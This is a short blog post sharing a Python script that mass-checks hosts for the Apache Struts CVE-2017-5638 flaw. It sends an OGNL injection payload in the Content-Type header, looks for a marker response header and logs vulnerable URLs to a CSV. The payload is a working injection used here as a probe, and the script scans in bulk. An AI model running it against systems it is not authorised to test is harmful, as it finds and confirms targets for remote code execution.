Skip to content

Quick script to check your hosts for CVE2017-5638

Here are my dirty python works on checking infamous CVE2017-5638 in a massive way.

Usage: python cve2017-5638_poc.py %url_list_file%
Vulnerable hosts are exported to vulnerable_list.csv file.

"""By Nick Babkin
Usage: python cve2017-5638_poc.py %url_list_file%
Vulnerable hosts are exported to vulnerable_list.csv file"""
#!/usr/bin/python
import requests
import sys
import csv

def bulkchecker():
    with open(sys.argv[1], 'rb') as csv_file:
        domainlist = csv.reader(csv_file)
        checkstring = "9306000"
        for row in domainlist:
            url_http = "http://" + "".join(row)
            url_https = "https://" + "".join(row)
            print "Checking " + url_http + " and " + url_https + " ..."
            payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Check-Struts',3000*3102)}.multipart/form-data"
            headers = {}
            headers = {'Content-Type': payload, 'User-Agent': 'Mozilla/5.0'}
            try:
                r_http = requests.get(url_http, headers=headers, verify=False, timeout=3)
                r_https = requests.get(url_https, headers=headers, verify=False, timeout=3)
            except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout, requests.exceptions.TooManyRedirects) as e:
                continue
            for key, value in r_http.headers.items():
                if value == checkstring:
                    print url_http + " is VULNERABLE"
                    with open('vulnerable_list.csv', 'a') as vulnerable_list:
                        vulnerable_list.write(url_http + "\n")
            for key, value in r_https.headers.items():
                if value == checkstring:
                    print url_https + " is VULNERABLE"
                    with open('vulnerable_list.csv', 'a') as vulnerable_list:
                        vulnerable_list.write(url_https + "\n")



bulkchecker()
Published inCoding

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

by Nick Babkin, (c) 2016-2017